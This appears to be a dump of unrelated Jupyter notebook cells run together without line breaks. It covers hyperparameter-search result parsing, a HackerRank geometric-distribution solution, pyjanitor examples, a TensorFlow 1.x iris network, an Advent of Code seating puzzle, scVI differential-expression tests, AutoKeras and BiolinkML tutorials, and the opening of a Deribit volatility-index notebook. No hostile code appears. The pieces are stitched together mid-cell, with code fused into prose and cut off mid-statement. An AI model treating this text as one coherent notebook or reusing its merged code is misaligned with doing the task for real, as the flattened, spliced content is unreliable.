the spread of these fractional errors:color_idx = np.linspace(0, 1, number_test) colors = np.array([plt.cm.rainbow(c) for c in color_idx]) plt.figure(figsize=(8,6)) frac_errs_stdev = np.std(frac_errs, axis=0) plt.plot(r_vals, frac_errs_stdev, alpha=0.8, color='blue', label='standard deviation') frac_errs_p16 = np.percentile(frac_errs, 16, axis=0) frac_errs_p84 = np.percentile(frac_errs, 84, axis=0) frac_errs_percentile = np.mean([np.abs(frac_errs_p16), np.abs(frac_errs_p84)], axis=0) plt.plot(r_vals, frac_errs_percentile, alpha=0.8, color='green', label="mean of 16/84 percentile") plt.xlabel('$r$') plt.ylabel(r'spread of fractional errors') plt.legend()os.mkdir('hp_search/models') os.mkdir('hp_search')os.mkdir('hp_search/conf') os.mkdir('hp_search/conf_json')import json max_digits = len(str(len(lstm_confs))) full_confs = [] for i, conf in enumerate(lstm_confs): fc = configs.create_conf_file(f'hp_search/conf/morph_charlstm.{str(i).zfill(max_digits)}.conf', f'hp_search/models/morph_charlstm.{str(i).zfill(max_digits)}.model', 'gold_morpheme', conf, 'alt_tok_yap_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/morph_charlstm.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc)) max_digits = len(str(len(cnn_confs))) full_confs = [] for i, conf in enumerate(cnn_confs): fc = configs.create_conf_file(f'hp_search/conf/morph_charcnn.{str(i).zfill(max_digits)}.conf', f'hp_search/models/morph_charcnn.{str(i).zfill(max_digits)}.model', 'gold_morpheme', conf, 'alt_tok_yap_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/morph_charcnn.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc))Tokenmax_digits = len(str(len(lstm_confs))) full_confs = [] for i, conf in enumerate(lstm_confs): fc = configs.create_conf_file(f'hp_search/conf/token_charlstm.{str(i).zfill(max_digits)}.conf', f'hp_search/models/token_charlstm.{str(i).zfill(max_digits)}.model', 'gold_token_bioes', conf, 'alt_tok_tokenized_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/token_charlstm.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc)) max_digits = len(str(len(cnn_confs))) full_confs = [] for i, conf in enumerate(cnn_confs): fc = configs.create_conf_file(f'hp_search/conf/token_charcnn.{str(i).zfill(max_digits)}.conf', f'hp_search/models/token_charcnn.{str(i).zfill(max_digits)}.model', 'gold_token_bioes', conf, 'alt_tok_tokenized_ft_sg') full_confs.append(fc) for i, fc in enumerate(full_confs): with open( f'hp_search/conf_json/token_charcnn.{str(i).zfill(max_digits)}.json', 'w') as of: of.write(json.dumps(fc))Check resultslen(cnn_confs[0]), len(lstm_confs[0]) lstm_confs[0] import re DEV_RES_LINE = re.compile('Dev: .*; acc: (?P[^,]+), p: (?P

[^,]+), r: (?P[^,]+), f: (?P[-\d\.]+)') res = [] for f in os.scandir('hp_search/logs'): if f.name.startswith('.ipy'): continue arch = f.name.split('.')[0] conf_num = f.name.split('.')[1] matching_conf = cnn_confs[int(conf_num)] if 'cnn' in arch else lstm_confs[int(conf_num)] params = { 'arch': arch, 'conf_num': conf_num} params.update(matching_conf) with open(f.path, 'r') as fp: i= 0 for line in fp: m = DEV_RES_LINE.match(line) if m: r = m.groupdict().copy() for k, v in r.items(): r[k] = float(v) r.update(params) r['epoch'] = i i+=1 res.append(r) rdf = pd.DataFrame(res) rdf.head() rdf.groupby(['conf_num', 'arch']).f.max().unstack() rdf.shape rdf.groupby('arch').f.max() rdf.groupby(['dropout', 'arch']).f.max().unstack() rdf.groupby(['hidden_dim', 'arch']).f.max().unstack() rdf.groupby(['lstm_layer', 'arch']).f.max().unstack() rdf.groupby(['optimizer', 'arch']).f.max().unstack() rdf[rdf.arch.str.contains('cnn')].groupby(['cnn_layer', 'arch']).f.max().unstack() rdf[rdf.arch.str.contains('lstm')].groupby(['char_hidden_dim', 'arch']).f.max().unstack() rdf.groupby(['optimizer', 'learning_rate', 'arch']).f.max().unstack()Solution to: [Day 4: Geometric Distribution I](https://www.hackerrank.com/challenges/s10-geometric-distribution-1/problem) Table of Contents- Table of Contents- Notes - Negative Binomial Experiment - Negative Binomial Distribution - Geometric Distribution - Example- Math Solution- Solution - Imports - Input - Geometric Distribution - Format - Main%%javascript $.getScript('https://kmahelona.github.io/ipython_notebook_goodies/ipython_notebook_toc.js')Notes Negative Binomial ExperimentThe negative binomial experiment has the following properties:- n, independent trials- binary outcome: success (s), or failure (f)- P(s) is the same for every trial- experiment continues until `x` successes are observed.If X is the number of experiments until the `x`th success, then X is a discrete random variable called a negative binomial. Negative Binomial DistributionConsider the following *probability mass function*\begin{equation}\largeb^{*}\text{(x, n, p)} = {n - 1 \choose x - 1} * p^{x} * q^{n-x}\end{equation}This is a negative binomial with the following properties:- number of successes to be observed is x- n, number of trials- p, p(x) in 1 trial- q, p(not x) in 1 trial- b*(x, n, p) is the negative binomial probability, MEANING: the probability of having x - 1 successes after n - 1 trials and having x successes after n trials Geometric Distribution*Geometric distribution* is the special case of a negative binomial distribution to determine the number of Bernoulli trials required for *a success*.Recall, X is the number of successes in n independent trials, so for each i, 1 <= i <= n\begin{equation}\largeX_{i}\begin{cases}1 \text{, if the ith trial is a success} \\0 \text{, otherwise}\end{cases}\end{equation}The geometric distribution is a negative binomial distribution where the number of successes is 1. We express this with the following formula:\begin{equation}\large\text{g(n, p)} = q^{n - 1} * p\end{equation} ExampleBob is a high school basketball player. He is a 70% free throw shooter, meaning his probability of making a free throw is 0.70. What is the probability that Bob makes his first free throw on his fifth shot?- n = 5- p = 0.7- q = 0.3\begin{equation}\large\text{ g(5, 0.7)} = 0.3^{4} * 0.7\end{equation}\begin{equation}\large0.00567\end{equation} Math SolutionThe probability that a machine produces a defective product is 1/3. What is the probability that the 1st defect is found during the 5th inspection?- n = 5- p = 1/3- q = 2/3\begin{equation}\large\text{g(n, p)} = q^{n-1} * p\end{equation}\begin{equation}\large(\frac{2}{3})^{4} * \frac{1}{3}\end{equation}\begin{equation}\large0.066\end{equation} Solution Importsfrom typing import TupleInputdef get_input() -> Tuple[float, int]: """Returns input for Day 4: Geometric distribution i. Returns: Tuple[float, int]: Geometric distribution p and n, respectively """ num, denom = [int(x) for x in input().split()] p = num / denom n = int(input()) return (p, n)Geometric Distributiondef calc_geom_dist(n: int, p: float) -> float: """Returns geometric distribution of n & p g(n, p) = q ** (n-1) * p Args: n (int): number of trials p (float): probability of x Returns: float: Geometric distribution, given n and p """ q = 1 - p return q ** (n-1) * pFormatdef format_scale(num: float) -> float: """Returns number formatted to scale Args: num (float): Number to format Returns: float: Number formatted to scale """ return "{:.3f}".format(num)Maindef main(): p, n = get_input() geom_dist = calc_geom_dist(n, p) print( format_scale(geom_dist)) if __name__ == "__main__": main()1 3 5 0.066Expose explicitly missing values with `complete`import pandas as pd import numpy as np import janitor # from http://imachordata.com/2016/02/05/you-complete-me/ df = pd.DataFrame( { "Year": [1999, 2000, 2004, 1999, 2004], "Taxon": [ "Saccharina", "Saccharina", "Saccharina", "Agarum", "Agarum", ], "Abundance": [4, 5, 2, 1, 8], } ) dfNote that Year 2000 and Agarum pairing is missing in the DataFrame above. Let’s make it explicit:df.complete('Year', 'Taxon') # A better viewing based on order df.complete('Year', 'Taxon', sort = True)What if we wanted the explicit missing values for all the years from 1999 to 2004? Easy - simply pass a dictionary pairing the column name with the new values:new_year_values = {'Year': range(df.Year.min(), df.Year.max() + 1)} df.complete(new_year_values, "Taxon")You can pass a callable as values in the dictionary:new_year_values = lambda year: range(year.min(), year.max() + 1) df.complete({"Year": new_year_values}, "Taxon", sort = True)You can get explcit rows, based only on existing data:# https://stackoverflow.com/q/62266057/7175713 df = {"Name" : ("Bob", "Bob", "Emma"), "Age" : (23,23,78), "Gender" :("Male", "Male", "Female"), "Item" : ("house", "car", "house"), "Value" : (5,1,3) } df = pd.DataFrame(df) dfIn the DataFrame above, there is no `car` Item value for the `Name`, `Age`, `Gender` combination -> `(Emma, 78, Female)`. Pass `(Name, Age, Gender)` and `Item` to explicitly expose the missing row:df.complete(('Name', 'Age', 'Gender'), 'Item')The example above showed how to expose missing rows on a group basis. There is also the option of exposing missing rows with the `by` parameter:df = pd.DataFrame( { "state": ["CA", "CA", "HI", "HI", "HI", "NY", "NY"], "year": [2010, 2013, 2010, 2012, 2016, 2009, 2013], "value": [1, 3, 1, 2, 3, 2, 5], } ) dfLet's expose all the missing years, based on the minimum and maximum year, for each state:result = df.complete( {'year': new_year_values}, by='state', sort = True ) resultYou can fill the nulls with Pandas' `fillna`:result.fillna(0, downcast = 'infer')import tensorflow as tf import numpy as np from sklearn import datasets from sklearn.model_selection import train_test_split RANDOM_SEED = 42 #tf.set_random_seed(RANDOM_SEED) #import tensorflow.compat.v1 as tf #tf.disable_v2_behavior() def init_weights(shape): """ Weight initialization """ weights = tf.random_normal(shape, stddev=0.1) return tf.Variable(weights) def forwardprop(X, w_1, w_2): """ Forward-propagation. IMPORTANT: yhat is not softmax since TensorFlow's softmax_cross_entropy_with_logits() does that internally. """ h = tf.nn.sigmoid(tf.matmul(X, w_1)) # The \sigma function yhat = tf.matmul(h, w_2) # The \varphi function return yhat def get_iris_data(): """ Read the iris data set and split them into training and test sets """ iris = datasets.load_iris() data = iris["data"] target = iris["target"] # Prepend the column of 1s for bias N, M = data.shape all_X = np.ones((N, M + 1)) all_X[:, 1:] = data # Convert into one-hot vectors num_labels = len(np.unique(target)) all_Y = np.eye(num_labels)[target] # One liner trick! return train_test_split(all_X, all_Y, test_size=0.33, random_state=RANDOM_SEED) def main(): train_X, test_X, train_y, test_y = get_iris_data() print("We are going to train a neural network") print("Be Patient") print ("We need to work hard on our data") # Layer's sizes x_size = train_X.shape[1] # Number of input nodes: 4 features and 1 bias #print(x_size,shape[1]) print("First we need to know X shape") print(train_X.shape[1]) print(train_X.shape[0]) print("Then wE need to know Y Shape") print(train_y.shape[1]) print(train_y.shape[0]) print(train_X) #print(train_y) h_size = 256 # Number of hidden nodes y_size = train_y.shape[1] # Number of outcomes (3 iris flowers) # Symbols X = tf.placeholder("float", shape=[None, x_size]) #X=tf.Variable(tf.ones(shape=[None, x_size]), dtype=tf.float32) y = tf.placeholder("float", shape=[None, y_size]) #y=tf.Variable(tf.ones(shape=[None, y_size]), dtype=tf.float32) # Weight initializations w_1 = init_weights((x_size, h_size)) w_2 = init_weights((h_size, y_size)) # Forward propagation yhat = forwardprop(X, w_1, w_2) predict = tf.argmax(yhat, axis=1) # Backward propagation cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=yhat)) updates = tf.train.GradientDescentOptimizer(0.01).minimize(cost) # Run SGD sess = tf.Session() init = tf.global_variables_initializer() sess.run(init) for epoch in range(100): # Train with each example for i in range(len(train_X)): sess.run(updates, feed_dict={X: train_X[i: i + 1], y: train_y[i: i + 1]}) train_accuracy = np.mean(np.argmax(train_y, axis=1) == sess.run(predict, feed_dict={X: train_X, y: train_y})) test_accuracy = np.mean(np.argmax(test_y, axis=1) == sess.run(predict, feed_dict={X: test_X, y: test_y})) print("Epoch = %d, train accuracy = %.2f%%, test accuracy = %.2f%%" % (epoch + 1, 100. * train_accuracy, 100. * test_accuracy)) sess.close() if __name__ == '__main__': main() pip install tensorflow==1.4.0 import tensorflow as tf # first, create a TensorFlow constant const = tf.constant(2.0, name="const") # create TensorFlow variables b = tf.Variable(2.0, name='b') c = tf.Variable(1.0, name='c') print(b) print(c) # now create some operations d = tf.add(b, c, name='d') e = tf.add(c, const, name='e') a = tf.multiply(d, e, name='a') # setup the variable initialisation #init_op = tf.global_variables_initializer() !pip install tensorflow==1.12.0 import tensorflow as tf print(tf.__version__) import tensorflow as tf print(tf.__version__)1.12.0Part 2def check_diagonal(array, row, col, rotate=False): if rotate: row = len(array) - 1 - row diag = np.diagonal(np.rot90(array), offset=col - row)[::-1] else: diag = np.diagonal(array, offset=col - row) return check_both_sides(diag, min(row, col)) def check_both_sides(vector, seat_idx): left = "".join(vector[:seat_idx]).replace(".", "") right = "".join(vector[seat_idx + 1:]).replace(".", "") left_occupied = 1 if left.endswith("#") else 0 right_occupied = 1 if right.startswith("#") else 0 return left_occupied + right_occupied def count_visible(array, row, col): visible = 0 visible += check_both_sides(array[row], col) # Check horizontally visible += check_both_sides(array[:, col], row) # Check vertically visible += check_diagonal(array, row, col, rotate=False) # Check diagonally visible += check_diagonal(array, row, col, rotate=True) # Check diagonally (rotated) return visible def transform_seat_pt2(array, row, col): seat_status = array[row, col] if seat_status == "L" and count_visible(array, row, col) == 0: return "#" elif seat_status == "#" and count_visible(array, row, col) >= 5: return "L" elif seat_status == ".": return "." else: return seat_status with open(INPUT_PATH / "day11_input.txt", "r") as f: array = [[c for c in l.rstrip()] for l in f.readlines()] out = musical_chairs(array, transform_seat_pt2, True, True)1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 Stopped after 72 updates. 2422 occupied seatsSeems to be a Heisenbug somewhere since the code produces the expected result for the example array...Answer should be 2023 after 85 updates :( RetryThis is a nice solution: https://github.com/davepage-mcr/aoc2020/blob/main/day11/seats.pydef count_visible_v2(array, row, col): neighbours = 0 # Look for first seat in 8 cardinal directions from (col, row) for dc, dr in [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, +1), (0, 1), (1, 1)]: occupied = False r = row + dr c = col + dc while r >= 0 and r < len(array) and c >= 0 and c < len(array[0]): if array[r][c] == '#': occupied = True break elif array[r][c] == 'L': break r += dr c += dc if occupied: neighbours += 1 return (neighbours) def transform_seat_pt2_v2(array, row, col): seat_status = array[row][col] if seat_status == "L" and count_visible_v2(array, row, col) == 0: return "#" elif seat_status == "#" and count_visible_v2(array, row, col) >= 5: return "L" elif seat_status == ".": return "." else: return seat_status out = musical_chairs(array, transform_seat_pt2_v2)Stopped after 85 updates. 2023 occupied seatsDifferential Expression DevelopmentTesting various functions for differential expression analysis. Importsfrom IPython.core.display import display, HTML import warnings warnings.filterwarnings('ignore') display(HTML("")) repo_path = '/Users/mincheolkim/Github/' data_path = '/Users/mincheolkim/Documents/' import sys sys.path.append(repo_path + 'scVI') sys.path.append(repo_path + 'scVI-extensions') import os import numpy as np from sklearn.manifold import TSNE import matplotlib %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns from scipy.ndimage.filters import gaussian_filter import pandas as pd import torch import imp from scipy.stats import ttest_ind, wasserstein_distance, ks_2samp from scipy.stats import norm from scvi.metrics.clustering import entropy_batch_mixing, get_latent from scvi.models import VAE, SVAEC, VAEC from scvi.inference import VariationalInference import scvi_extensions.dataset.supervised_data_loader as sdl import scvi_extensions.dataset.cropseq as cs import scvi_extensions.inference.supervised_variational_inference as svi import scvi_extensions.hypothesis_testing.mean as mn import scvi_extensions.hypothesis_testing.utils as utils import scvi_extensions.dataset.label_data_loader as ldlCreate a dataseth5_filename = '/Users/mincheolkim/Documents/raw_gene_bc_matrices_h5.h5' abridged_metadata_filename = data_path + 'batf_nc_metadata.txt' imp.reload(cs) # Load the dataset gene_dataset = cs.CropseqDataset( filename=h5_filename, metadata_filename=abridged_metadata_filename, new_n_genes=1000, use_donors=True, use_labels='guide', save_path='') imp.reload(cs) # Load the dataset gene_dataset_de = cs.CropseqDataset( filename=h5_filename, metadata_filename=abridged_metadata_filename, new_n_genes=1000, use_donors=True, use_labels='guide', testing_labels='guide', save_path='')Preprocessing CROP-seq dataset Number of cells kept after filtering with metadata: 1400 Number of cells kept after removing all zero cells: 1400 Finished preprocessing CROP-seq dataset Downsampling from 32738 to 1000 genesUseful functionsdef plot_pair_densities(vae, inference, n_points=1000, sigma=1.5): latent, batch_indices, labels = get_latent(vae, inference.data_loaders['sequential']) latent, idx_t_sne = inference.apply_t_sne(latent, n_points) batch_indices = batch_indices[idx_t_sne].ravel() labels = labels[idx_t_sne].ravel() plt.figure(figsize=(10, 20)) for label, guide in enumerate(inference.gene_dataset.guide_lookup): guide_latent = latent[labels == label, :] guide_heatmap, guide_xedges, guide_yedges = np.histogram2d(guide_latent[:, 0], guide_latent[:, 1], bins=30) guide_heatmap = gaussian_filter(guide_heatmap, sigma=sigma) plt.subplot(1, len(inference.gene_dataset.guide_lookup)+1, label+1) plt.imshow(guide_heatmap.T, extent=None, origin='lower', cmap=matplotlib.cm.jet, aspect=1) plt.title(guide) plt.show()Supervised trainingn_epochs=200 lr=1e-4 use_batches=True use_cuda=False vaec = VAEC(gene_dataset.nb_genes, n_labels=gene_dataset.n_labels, n_batch=gene_dataset.n_batches * use_batches) supervised_infer = svi.SupervisedVariationalInference( vaec, gene_dataset, train_size=0.9, use_cuda=use_cuda, verbose=False, frequency=1) supervised_infer.train(n_epochs=n_epochs, lr=lr) torch.save(vaec, '/Users/mincheolkim/Documents/vaec_batf_nc.model') vaec = torch.load('/Users/mincheolkim/Documents/vaec_batf_nc.model', lambda storage, loc: storage) plt.plot(supervised_infer.history['ll_test']) plt.title('Test loss') plt.ylabel('ll') plt.xlabel('iter') plot_pair_densities(vaec, supervised_infer, n_points=5000, sigma=2)Differential ExpressionI test out some ways to perform differential expression.First, I use scVI's method directly to compare any DE genes between BATF and control (there aren't any, in their definition) Default method for differential expressionimp.reload(mn) null_rates, de_results = mn.differential_expression(vaec, gene_dataset_de, [0, 1], 100) gene_dataset_de.guide_lookup de_results[0][1].head(5) de_results[0][1].tail(5)Looking at distribution of Bayes factors for a gene and cell typeimp.reload(mn) h1_bayes_factors, h0_bayes_factors = mn.batch_differential_expression( vaec, gene_dataset_de, M_sampling=100, desired_labels=[0, 1]) plt.figure(figsize=(15, 5)); plt.subplot(1, 2, 1); sns.distplot(h0_bayes_factors[:, 410], kde=False, bins=20) sns.distplot(h1_bayes_factors[:, 410], kde=False, bins=20) plt.legend(['Null', 'Alternate']); plt.title('Sampling distribution of Bayes factors (SAP18)'); plt.xlabel('Bayes Factor');plt.ylabel('count'); plt.subplot(1, 2, 2); sns.distplot(h0_bayes_factors[:, 336], kde=False, bins=20) sns.distplot(h1_bayes_factors[:, 336], kde=False, bins=20) plt.legend(['Null', 'Alternate']); plt.title('Sampling distribution of Bayes factors (LSM3)'); plt.xlabel('Bayes Factor');plt.ylabel('count'); plt.savefig('/Users/mincheolkim/Documents/scvi_outputs/labmeeting/de_bf_sampling_dist.png', bbox='tight')/anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been " /anaconda3/envs/scvi/lib/python3.6/site-packages/matplotlib/axes/_axes.py:6462: UserWarning: The 'normed' kwarg is deprecated, and has been replaced by the 'density' kwarg. warnings.warn("The 'normed' kwarg is deprecated, and has been "import numpy as np import pandas as pd import seaborn as sns sns.set_style('darkgrid') df1 = pd.read_csv('df1.csv', index_col=0) df2 = pd.read_csv('df2.csv') df1 df2 df1['A'].hist(bins=30, grid=False, figsize=(10,5)) df2.plot.area(figsize=(10,5), alpha=0.4) df2.plot.bar(figsize=(10,5), stacked=True) #index should be categorical for barplots df1.plot.scatter(x='A', y='B', s=df1['C']*100, figsize=(10,5)); df2.plot.box() #use sns for boxplot df = pd.DataFrame(np.random.randn(1000,2), columns=['A', 'B']) df.head() df.plot.hexbin(x='A', y='B', gridsize=25, cmap='coolwarm', figsize=(10,10)) df2['a'].plot.kde() df2.plot.density()A Simple ExampleThe first step is to prepare your data. Here we use the [California housingdataset](https://scikit-learn.org/stable/datasets/index.htmlcalifornia-housing-dataset) as an example.from sklearn.datasets import fetch_california_housing import numpy as np import pandas as pd import tensorflow as tf import autokeras as ak house_dataset = fetch_california_housing() df = pd.DataFrame( np.concatenate(( house_dataset.data, house_dataset.target.reshape(-1,1)), axis=1), columns=house_dataset.feature_names + ['Price']) train_size = int(df.shape[0] * 0.9) df[:train_size].to_csv('train.csv', index=False) df[train_size:].to_csv('eval.csv', index=False) train_file_path = 'train.csv' test_file_path = 'eval.csv'The second step is to run the[StructuredDataRegressor](/structured_data_regressor).# Initialize the structured data regressor. reg = ak.StructuredDataRegressor( overwrite=True, max_trials=3) # It tries 10 different models. # Feed the structured data regressor with training data. reg.fit( # The path to the train.csv file. train_file_path, # The name of the label column. 'Price', epochs=10) # Predict with the best model. predicted_y = reg.predict(test_file_path) # Evaluate the best model with testing data. print(reg.evaluate(test_file_path, 'Price'))Data FormatThe AutoKeras StructuredDataRegressor is quite flexible for the data format.The example above shows how to use the CSV files directly. Besides CSV files, it alsosupports numpy.ndarray, pandas.DataFrame or [tf.data.Dataset](https://www.tensorflow.org/api_docs/python/tf/data/Dataset?version=stable). The data should betwo-dimensional with numerical or categorical values.For the regression targets, it should be a vector of numerical values.AutoKeras accepts numpy.ndarray, pandas.DataFrame, or pandas.Series.The following examples show how the data can be prepared with numpy.ndarray,pandas.DataFrame, and tensorflow.data.Dataset.import pandas as pd import numpy as np # x_train as pandas.DataFrame, y_train as pandas.Series x_train = pd.read_csv(train_file_path) print(type(x_train)) # pandas.DataFrame y_train = x_train.pop('Price') print(type(y_train)) # pandas.Series # You can also use pandas.DataFrame for y_train. y_train = pd.DataFrame(y_train) print(type(y_train)) # pandas.DataFrame # You can also use numpy.ndarray for x_train and y_train. x_train = x_train.to_numpy().astype(np.unicode) y_train = y_train.to_numpy() print(type(x_train)) # numpy.ndarray print(type(y_train)) # numpy.ndarray # Preparing testing data. x_test = pd.read_csv(test_file_path) y_test = x_test.pop('Price') # It tries 10 different models. reg = ak.StructuredDataRegressor(max_trials=3, overwrite=True) # Feed the structured data regressor with training data. reg.fit(x_train, y_train, epochs=10) # Predict with the best model. predicted_y = reg.predict(x_test) # Evaluate the best model with testing data. print(reg.evaluate(x_test, y_test))The following code shows how to convert numpy.ndarray to tf.data.Dataset.train_set = tf.data.Dataset.from_tensor_slices((x_train, y_train)) test_set = tf.data.Dataset.from_tensor_slices((x_test.to_numpy().astype(np.unicode), y_test)) reg = ak.StructuredDataRegressor(max_trials=3, overwrite=True) # Feed the tensorflow Dataset to the regressor. reg.fit(train_set, epochs=10) # Predict with the best model. predicted_y = reg.predict(test_set) # Evaluate the best model with testing data. print(reg.evaluate(test_set))You can also specify the column names and types for the data as follows.The `column_names` is optional if the training data already have the column names, e.g.pandas.DataFrame, CSV file.Any column, whose type is not specified will be inferred from the training data.# Initialize the structured data regressor. reg = ak.StructuredDataRegressor( column_names=[ 'MedInc', 'HouseAge', 'AveRooms', 'AveBedrms', 'Population', 'AveOccup', 'Latitude', 'Longitude'], column_types={'MedInc': 'numerical', 'Latitude': 'numerical'}, max_trials=10, # It tries 10 different models. overwrite=True, )Validation DataBy default, AutoKeras use the last 20% of training data as validation data.As shown in the example below, you can use `validation_split` to specify the percentage.reg.fit(x_train, y_train, # Split the training data and use the last 15% as validation data. validation_split=0.15, epochs=10)You can also use your own validation setinstead of splitting it from the training data with `validation_data`.split = 500 x_val = x_train[split:] y_val = y_train[split:] x_train = x_train[:split] y_train = y_train[:split] reg.fit(x_train, y_train, # Use your own validation set. validation_data=(x_val, y_val), epochs=10)Customized Search SpaceFor advanced users, you may customize your search space by using[AutoModel](/auto_model/automodel-class) instead of[StructuredDataRegressor](/structured_data_regressor). You can configure the[StructuredDataBlock](/block/structureddatablock-class) for some high-levelconfigurations, e.g., `categorical_encoding` for whether to use the[CategoricalToNumerical](/block/categoricaltonumerical-class). You can also do not specify thesearguments, which would leave the different choices to be tuned automatically. Seethe following example for detail.import autokeras as ak input_node = ak.StructuredDataInput() output_node = ak.StructuredDataBlock(categorical_encoding=True)(input_node) output_node = ak.RegressionHead()(output_node) reg = ak.AutoModel( inputs=input_node, outputs=output_node, overwrite=True, max_trials=3) reg.fit(x_train, y_train, epochs=10)The usage of [AutoModel](/auto_model/automodel-class) is similar to the[functional API](https://www.tensorflow.org/guide/keras/functional) of Keras.Basically, you are building a graph, whose edges are blocks and the nodes are intermediate outputs of blocks.To add an edge from `input_node` to `output_node` with`output_node = ak.[some_block]([block_args])(input_node)`.You can even also use more fine grained blocks to customize the search space evenfurther. See the following example.import autokeras as ak input_node = ak.StructuredDataInput() output_node = ak.CategoricalToNumerical()(input_node) output_node = ak.DenseBlock()(output_node) output_node = ak.RegressionHead()(output_node) reg = ak.AutoModel(inputs=input_node, outputs=output_node, max_trials=3, overwrite=True) reg.fit(x_train, y_train, epochs=10)You can also export the best model found by AutoKeras as a Keras Model.model = reg.export_model() model.summary() model.predict(x_train)How to extend a biolink modeling language (BiolinkML) model!pip install -q yamlmagic !pip install -q .. %load_ext yamlmagic %%yaml model # Every model must have a globally unique URI. This is the external name of the model id: http://example.org/examples/distributeExample # Every model should also have a globally unique name (well, global within the context of the particular modeling environment) name: dist1 # Descriptions are always useful, but not required description: A toy extension to the base biolink model # Versions are recommended but not required. The version is copied into the output artifacts. An error will be raised # if two different versions of the same model are imported version: 0.0.1 # A license is not required at this point -- should it be? license: https://creativecommons.org/publicdomain/zero/1.0/ # Prefixes can be assigned specifically. We define two below: # biolink -- the prefix used by the biolink-model # dist1 -- the URI prefix used by this example. Note that the dist1 prefix may or may not align with the model id prefixes: biolink: https://w3id.org/biolink/vocab/ biolinkml: https://w3id.org/biolink/biolinkml/ dist: http://example.org/examples/dist1# # Prefixes can also be pulled from a prefixcommons compliant site. The map below uses the definitions found in # https://github.com/prefixcommons/biocontext/blob/master/registry/semweb_context.yaml. default_curi_maps: - semweb_context # The default prefix is what is used in the subsets, types, slots, classes sections below if not otherwise supplied default_prefix: dist default_range: string # The list of prefixes to emit target files. Note that all prefixes that are used elsewhere in the model are automatically # emitted, with the exception of emit_prefixes: - skos - rdf - dist # List of models to import. Note that import specifications can (currently) be URI's, absolute (file://...file), curies # (biolink:model), or relative (includes/myfile) file names. Note, however, that this latter form is being deprecated. # The location of imported files can now be specified in an accompanying mapping file. The imports below reference: # https://w3id.org/biolink/biolink-model -- the biolink model # https://w3id.org/biolink/biolinkml/types -- the biolink modeling language types definitions imports: - https://w3id.org/biolink/biolink-model - biolinkml:types # Subsets that are defined in this model extension subsets: experimental: # A subset should have a description description: model elements that have not yet been tested # Types that are defined in this model extension types: gene sequence: uri: dist:seq typeof: string description: A gene sequence # Slots that are defined in this model extension slots: gene has sequence: description: A gene pattern domain: gene range: gene sequence slot_uri: dist:hasSeq required: true # Classes that are defined in this model extension classes: # The class name. For most generators, this will be transformed to CamelCase (MyGene) my gene: description: This is an example extension. Doesn't do a lot is_a: gene slots: - gene has sequence from biolinkml.generators.pythongen import PythonGenerator from logging import ERROR # Note: Jupyter appears to generate output even if the log_level is set. gen = PythonGenerator(model, log_level=ERROR) print(gen.serialize())# Auto generated from None by pythongen.py version: 0.3.0 # Generation date: 2019-10-23 14:25 # Schema: dist1 # # id: http://example.org/examples/distributeExample # description: A toy extension to the base biolink model # license: https://creativecommons.org/publicdomain/zero/1.0/ from typing import Optional, List, Union, Dict, ClassVar from dataclasses import dataclass from biolinkml.utils.metamodelcore import empty_list, empty_dict, bnode from biolinkml.utils.yamlutils import YAMLRoot from biolinkml.utils.formatutils import camelcase, underscore, sfx from rdflib import Namespace, URIRef from biolinkml.utils.curienamespace import CurieNamespace from biolink.model import AnatomicalEntityId, BiologicalSequence, DiseaseOrPhenotypicFeatureId, Gene, GeneId, GeneOrGeneProductId, GeneProductId, GenomicEntityId, IdentifierType, IriType, LabelType, MolecularEntityId, NamedThingId, NarrativeText, OrganismTaxonId, PhenotypicFeatureId, SymbolType, TranscriptId from biolinkml.utils.metamodelcore[...]Volatility Indices Calculation This notebook explains how the module *vxbt_calc* calculates the XVBT, AXVBT and GXVBT indices using data from Deribit.import calendar import numpy as np import openapi_client as dbitApi import pandas as pd from datetime import datetimeUtility functions for time calculations, Deribit API and dataframe formattingdef format_datetime_to_expiry(date): return datetime.strftime(date, '%-d%b%y').upper() def get_near_next_terms(now): c = calendar.Calendar(firstweekday=calendar.MONDAY) this_month_cal = c.monthdatescalendar(now.year, now.month) this_fridays = [datetime(day.year, day.month, day.day, 8, 0, 0) for week in this_month_cal for day in week if day.weekday() == calendar.FRIDAY and day.month == now.month and datetime(day.year, day.month, day.day, 8, 0, 0) >= now] next_year = now.year if now.month < 12 else now.year + 1 next_month = now.month + 1 if now.month < 12 else 1 next_month_cal = c.monthdatescalendar(next_year, next_month) next_fridays = [datetime(day.year, day.month, day.day, 8, 0, 0) for week in next_month_cal for day in week if day.weekday() == calendar.FRIDAY and day.month == next_month and datetime(day.year, day.month, day.day, 8, 0, 0) >= now] fridays = this_fridays + next_fridays near_term, next_term = fridays[0], fridays[1] return (format_datetime_to_expiry(near_term), format_datetime_to_expiry(next_term), near_term, next_term) def get_index(currency='BTC'): try: index_result = api.public_get_index_get(currency)['result'][currency] return index_result except dbitApi.exceptions.ApiException as e: print(e) #logger.exception('Exception when calling MarketDataApi->public_get_instruments_get!') exit() def get_instruments_with_expiry(expiry, currency='BTC', kind='option', expired='false'): try: instrument_result = api.public_get_instruments_get(currency, kind=kind, 